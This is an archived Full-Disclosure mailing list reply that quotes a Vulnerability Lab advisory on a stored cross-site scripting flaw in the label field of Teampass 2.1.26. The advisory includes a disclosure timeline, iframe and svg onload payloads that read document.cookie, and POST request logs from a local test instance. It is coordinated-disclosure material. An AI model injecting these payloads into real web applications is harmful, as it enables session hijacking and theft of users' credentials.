lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 25 May 2016 21:05:07 +1000
From: Ulisses Montenegro <ulisses.montenegro@...il.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting
	Vulnerability

This looks very similar to the persistent XSS reported a while ago on the
Teampass github, is it the same vulnerability?

https://github.com/nilsteampassnet/TeamPass/issues/1244



On 25 May 2016 at 19:10, Vulnerability Lab <research@...nerability-lab.com>
wrote:

> Document Title:
> ===============
> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1845
>
>
> Release Date:
> =============
> 2016-05-24
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1845
>
>
> Common Vulnerability Scoring System:
> ====================================
> 3.4
>
>
> Product & Service Introduction:
> ===============================
> TeamPass is a Passwords Manager dedicated for managing passwords in a
> collaborative way on any server Apache, MySQL and PHP.
> It is especially designed to provide passwords access security for allowed
> people. This makes TeamPass really useful in a
> Business/Enterprise environment and will provide to IT or Team Manager a
> powerful and easy tool for customizing passwords
> access depending on the user’s role.
>
> (Copy of the Homepage:  http://teampass.net/  )
>
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered an
> application-side cross site scripting vulnerability in the Teampass
> v2.1.25/26 application.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
> 2016-05-18 Vendor Notification (Teampass Security Team)
> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Affected Product(s):
> ====================
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application)
> 2.1.25
>
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application)
> 2.1.26
>
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Medium
>
>
> Technical Details & Description:
> ================================
> An application-side cross site scripting web vulnerability has been
> discovered in the official Teampass v2.1.26 web-application.
> The vulnerability allows remote attackers to inject own malicious script
> codes to the application-side of the vulnerable module or function.
>
> Teampass allows authenticated users to create items to store usernames,
> passwords, descriptions, files and more. When creating or editing an
> item the very first field, the label field, is vulnerable to iframe
> injection and XSS insertion. The iframe or cross site scripting will be
> executed as soon as a user opens a folder. The attack vector is persistent
> and the request method to inject is POST.
>
> The security risk of the application-side vulnerability is estimated as
> medium with a cvss (common vulnerability scoring system) count of 3.4.
> Exploitation of the persistent web vulnerability requires a low privileged
> web-application user account and low or medium user interaction.
> Successful exploitation of the vulnerability results in session hijacking,
> persistent phishing attacks, persistent external redirects to
> malicious source and persistent manipulation of affected or connected
> application modules.
>
> Request Method(s):
>                                 [+] POST
>
> Vulnerable Function(s):
>                                 [+] Add or Edit (Label)
>
> Vulnerable Parameter(s):
>                                 [+] label name
>
> Affected Module(s):
>                                 [+] Item Listing
>
>
> Proof of Concept (PoC):
> =======================
> The persistent cross site scripting web vulnerability can be exploited by
> remote attackers without privileged web-application user account and low or
> medium user interaction.
> For security demonstration or to reproduce the vulnerability follow the
> provided information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1. Create or edit an item
> 2. Change the first label name field to a script code payload
> Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"
> onload=alert(document.cookie)<></iframe>  or
> <svg/onload=alert(document.cookie)>
> 3. The execute occurs in the main label field output context value
> 4. Successful reproduce of the application-side vulnerability!
>
>
> --- PoC Session Logs [POST] ---
> Status: 200[OK]
> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
> Mime Type[application/json]
>    Request Header:
>       Host[teampass.localhost:8080]
>       User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
> Gecko/20100101 Firefox/46.0]
>       Accept[application/json, text/javascript, */*; q=0.01]
>       X-Requested-With[XMLHttpRequest]
>       Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>       Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
> PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>       Connection[keep-alive]
>    POST-Daten:
>       cproject_id[23]
>       password_id[73]
>       name[Dans+Linux+user+%22%3E%3C[SCIRPT CODE PAYLOAD INJECT VIA NAME
> LABEL!]%3E]
>       tags[]
>       hidden-tags[]
>       access_info[]
>       faketextdonotautofill1[]
>       username[dan]
>       faketextdonotautofill2[]
>       email[]
>       fakepwddonotautofill1[]
>       password[hello]
>       password_visible[hello]
>       fakepwddonotautofill2[]
>       repeat_password[hello]
>       repeat_password_visible[hello]
>       expiry_date_edit[]
>       notes[]
>    Response Header:
>       Date[Wed, 25 May 2016 08:53:48 GMT]
>       Server[Apache]
>       X-Powered-By[PHP/5.4.4-14+deb7u8]
>       Expires[Thu, 19 Nov 1981 08:52:00 GMT]
>       Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0]
>       Pragma[no-cache]
>       Content-Length[74]
>       Keep-Alive[timeout=5, max=99]
>       Connection[Keep-Alive]
>       Content-Type[application/json; charset=utf-8]
> -
> Status: 200[OK]
> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
> Mime Type[text/html]
>    Request Header:
>       Host[teampass.localhost:8080]
>       User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
> Gecko/20100101 Firefox/46.0]
>       Accept[text/html, */*; q=0.01]
>       X-Requested-With[XMLHttpRequest]
>       Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>       Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
> __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>       Connection[keep-alive]
>    Response Header:
>       Date[Wed, 25 May 2016 08:53:49 GMT]
>       Server[Apache]
>       X-Powered-By[PHP/5.4.4-14+deb7u8]
>       Connection[Keep-Alive]
>       Content-Type[text/html]
>
>
> Reference(s):
> http://teampass.localhost:8080/
> http://teampass.localhost:8080/index.php/
> http://teampass.localhost:8080/index.php/pwd/
> http://teampass.localhost:8080/index.php/checkss/
> http://teampass.localhost:8080/index.php/checkss/n/
> http://teampass.localhost:8080/index.php/checkss/n/pwd
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>
>
> Security Risk:
> ==============
> The security risk of the application-side cross site scripting
> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>
>
> Credits & Authors:
> ==================
> Peter Kok -  [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties, either expressed or
> implied,
> including the warranties of merchantability and capability for a
> particular purpose. Vulnerability-Lab or its suppliers are not liable in
> any case of damage,
> including direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers have
> been advised
> of the possibility of such damages. Some states do not allow the exclusion
> or limitation of liability for consequential or incidental damages so the
> foregoing
> limitation may not apply. We do not approve or encourage anybody to break
> any licenses, policies, deface websites, hack into databases or trade with
> stolen data.
>
> Domains:    www.vulnerability-lab.com           - www.vuln-lab.com
>                                       - www.evolution-sec.com
> Contact:    admin@...nerability-lab.com         -
> research@...nerability-lab.com                                -
> admin@...lution-sec.com
> Section:    magazine.vulnerability-lab.com      -
> vulnerability-lab.com/contact.php                             -
> evolution-sec.com/contact
> Social:     twitter.com/vuln_lab                -
> facebook.com/VulnerabilityLab                                 -
> youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php   -
> vulnerability-lab.com/rss/rss_upcoming.php                    -
> vulnerability-lab.com/rss/rss_news.php
> Programs:   vulnerability-lab.com/submit.php    -
> vulnerability-lab.com/list-of-bug-bounty-programs.php         -
> vulnerability-lab.com/register.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory. Permission to
> electronically
> redistribute this alert in its unmodified form is granted. All other
> rights, including the use of other media, are reserved by Vulnerability-Lab
> Research Team or
> its suppliers. All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific
> authors or managers. To record, list, modify, use or edit our material
> contact (admin@ or research@...nerability-lab.com) to get a ask
> permission.
>
>                                     Copyright © 2016 | Vulnerability
> Laboratory - [Evolution Security GmbH]™
>
>
>
>
> --
> VULNERABILITY LABORATORY - RESEARCH TEAM
> SERVICE: www.vulnerability-lab.com
> CONTACT: research@...nerability-lab.com
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/




-- 
“If debugging is the process of removing software bugs, then programming
must be the process of putting them in.” - *Edsger Dijkstra*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ